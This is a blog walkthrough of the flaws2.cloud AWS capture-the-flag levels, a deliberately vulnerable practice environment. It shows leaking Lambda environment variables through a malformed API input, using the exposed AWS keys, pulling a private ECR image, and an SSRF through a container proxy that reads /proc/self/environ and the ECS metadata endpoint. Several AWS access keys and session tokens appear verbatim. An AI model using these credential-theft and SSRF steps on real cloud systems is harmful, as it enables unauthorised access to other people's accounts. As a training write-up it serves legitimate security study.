Flaws2.cloud Walkthrough

Posted on

Continuing Cloud Pentesting the second version of flaws included tactics for engaging AWS cloud infrastructure. Identify AWS Services, Container Environment Variables and accessing Metadata Services.

Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.

Level 1 - Identify AWS Services

Identify AWS Service

1
nslookup flaws2.cloud

IP: 52.216.27.155 identified

1
nslookup 52.216.27.15

AWS S3 Bucket identified: s3-website-us-east-1.amazonaws.com

Bypass PIN Code

To bypass enter letters/words to confuse coding that is expecting integers.

Access S3 Version URL http://flaws2.cloud.s3-website-us-east-1.amazonaws.com/

Form Request Form is requesting https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=1234

enter a non number into URI https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=g

AWS Keys Discovered

1
2
3
4
5
6
7
8
9
10
11
"AWS_REGION":"us-east-1",
"_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129",
"PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"AWS_SESSION_TOKEN":"IQoJb3JpZ2luX2VjEKv//////////wEaCXVzLWVhc3QtMSJHMEUCIQCKlm11Ye4Lew8zSpfDZNu46hb776U7xJ7y4vPkP5YnPQIgONlkkXSDL6XJgKrS+2pBQRounJjy+KqltKkBZ9uxqxcqlAIIxP//////////ARACGgw2NTM3MTEzMzE3ODgiDF1mJQJdzIuYiUFkdCroAaphOHDiYyt51bfOmOb2yueu2KRaXS+iBt8lwvmD+UEkaUxb0+AWHqgy9peqrx1q7ppF8BwORt9oKbcLl0ywRJBM0M7hNSotxkAM7NVW0WHXqPr2yt5fXHf/tpRlNoIGKtb5aIcq8VpxXvOxQPF3QBlvAqSXqRMkTxIf4NY9tLT2bWTssrX5ISHA07Y5ccSIIbKdak/alIimz8ejiCp7Ow41WJlQLmU0f+CGJgf6UgkHHwIneq+mzKbmfejg9sla1/xy6En27TrwUs3sGz1cuQkOHI52ma5Nq4PtJg9Okjr/ntAVIGeMI/sw7/GWjwY6mgFxa+eME8NMqH/7Xvr83+JsWkjdMv4xb2GUyNKrO8vTFPX5jVdsusbJ+CLx+g12XrCkMM934lePYiJDFmdp1LLvBZMXpHWbxgTWVcNWmRuyDm6JfjivdQWNUCU+vQLQQzlDMTFUboFqYiUtJy5PWdzb5cx332lkO8WSwFXiEob/s+q+QoxcaAtqtuqARUJzqE2tKxvdOhdkZgl7",
"LAMBDA_RUNTIME_DIR":"/var/runtime","AWS_LAMBDA_RUNTIME_API":"127.0.0.1:9001",
"AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129:2000",
"AWS_SECRET_ACCESS_KEY":"X4YVBViEtxLBSwBBK6MivIq+JbttvxhCkA+6G2+2",
"AWS_EXECUTION_ENV":"AWS_Lambda_nodejs8.10",
"_HANDLER":"index.handler",
"AWS_DEFAULT_REGION":"us-east-1",
"AWS_ACCESS_KEY_ID":"ASIAZQNB3KHGNJ6GOJF2",

Connnect to S3 Bucket with Credentials

Modify /.aws/credentials

/.aws/config

List contents of S3 Bucket

1
aws --profile flaws2 s3 ls s3://level1.flaws2.cloud

secret discovered.

The next level is at http://level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud

Level 2 - Containers Environmental Variables

This next level is running as a container at http://container.target.flaws2.cloud/.

ECR Instance

All flaw2 instances are located at us-east-1

discover account ID

1
aws --profile flaws2 sts get-caller-identity

account: 653711331788

list flaws2 image instances

1
aws ecr list-images --repository-name level2 --registry-id 653711331788

List ECR Images

if ECR is public:

1
aws ecr list-images --repository-name REPO_NAME --registry-id ACCOUNT_ID

syntax:

1
 aws --profile flaws2 ecr list-images --repository-name level2

Connect to Docker with AWS

1
aws --profile flaws2 ecr get-login-password --region us-east-1 | sudo docker login --username AWS --password-stdin 653711331788.dkr.ecr.us-east-1.amazonaws.com

Pipes the get-login-password from aws to docker login to be able to download image file.

Pull Docker of ECR

1
sudo docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest

Docker Inspect

1
docker inspect 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest

Launch Docker file

1
sudo docker run -ti -p8000:8000 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2 bash

Level 3 Link Link is found on the webserver of the docker image /var/www/html/index.htm

link: http://level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud

Level 3 - Metadata Services at 169.254.170.2

The container’s webserver you got access to includes a simple proxy that can be access with: http://container.target.flaws2.cloud/proxy/http://flaws.cloud or http://container.target.flaws2.cloud/proxy/http://neverssl.com

AWS Credentials on 169.254.170.2

EC2 instances contain credentials at 169.254.170.2/v2/GUID and the GUID = found as an environmental variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

Linux Enviorment Variables

1
/proc/self/environ

Call environment variables of container

http://container.target.flaws2.cloud/proxy/file:///proc/self/environ

Call via metadata service 169.254.170.2

using variables captured using the ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/efd02f49-194c-477b-9fa5-2b408352ac1e

1
curl http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v4/efd02f49-194c-477b-9fa5-2b408352ac1e | jq ![](https://paper-attachments.dropbox.com/s_3848B9A113589EB5E67286B30D076C875D453E4C308CFAFDFF705CABBD5B86F3_1642694150657_image.png)

Using the variables captured using the CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/f536c20a-9a31-4f65-8f4e-0a201a72f7b0

http://container.target.flaws2.cloud/proxy/http://169.254.170.2//v2/credentials/f536c20a-9a31-4f65-8f4e-0a201a72f7b0

1
curl http://container.target.flaws2.cloud/proxy/http://169.254.170.2//v2/credentials/f536c20a-9a31-4f65-8f4e-0a201a72f7b0 | jq


1
2
3
"AccessKeyId": "ASIAZQNB3KHGIKJQOEX4",
"SecretAccessKey": "GgnmwIE/SQGXvJCxsezAk7v5YzcSttVa8B4MzOrx",
"Token": "IQoJb3JpZ2luX2VjEO///////////wEaCXVzLWVhc3QtMSJGMEQCIAvPq6ATzhFfa1Rty8E2hmMrke4IR/52WRtguCcqECPuAiAdXRc5dPwr42nJi1PZ7HdflKwh3obffENhYb3qzwwODyrjAwgYEAIaDDY1MzcxMTMzMTc4OCIMLx+UrX+F5KqGJeZbKsADKlVqIEpwxD58vQaF/dS5M76OTzKqF6ZN6k4prGEBta9pxipCktrtrxgWZfzYepJmoO/xmoscP9R9Fg7c1KpADSZIeZvbgAd0NvHPy47Wo/o3fNpB3XpL0zcCAimhHCFICMXIfNl0+fD0PF0us22H/zY4x6vJl5WtqttSf91sXw2BO06NbBYUWjPZXDTFtDsTjbc/2/jMLr/Yd4ssuqkHCeg+fgtB10jaLZppeP0zhoLjCW5F0mSY2cN68zEsZtwfIkNheGmKva8C4TEnW1LNaRmtSYXldVoXDEFaawGH2Jou+wFbC0qo7rc86/Yaf4HErisEKAxrS8Zlz08iRqxCQh2I9nDd7MlVB7tfD7wn5aB0DGT1y4k3DXn9kioZqX3QjXO+v6JDi/tolMbesrQlarErS/DJNUX1lRAQkjjNz5OVEDCbSg4XHVapeCVH54bvDlwv/4AY6Fssd2G+QC24f0Mw//GZ6BWLJ3ofv7nw2iYBJryRNZbKuHg/Aw9lOKdI1YYv7dep9qYN7C0gab8BQzoP7Da26vEAUQSjx2Gb2vrYjHnTV9Sz6RvyAkVMMxGFKL8+vbi+Lia3GYh5K+P0DzCs7aWPBjqmAcTg0Rp9u4VAnNC6rtpAqKpYFOjwlR+fgCqstx2ULQ6njCDq7++mhUWj/w+Qspd8Q0vHO7+gjGNEC9lii1rX6TT8NAyockvkOHyrG5VBS3Xe2fTNbuiWvDpz38dHQZnR6swKtZlzrxck6N/2OR02zeeptnnKfLb1aPa+3rgS/LAFSqg2tGRSNXg7Ne1jluCMG+OCvYOw7fwXvvHAVveHX5WMLRjFffo=",

Access S3 bucket with credentials

Add credentials to the ~/.aws/credentials

List contents of S3 Bucket

1
aws --profile flaws2l3 s3 ls

Navigate to “the-end” URL http://the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud/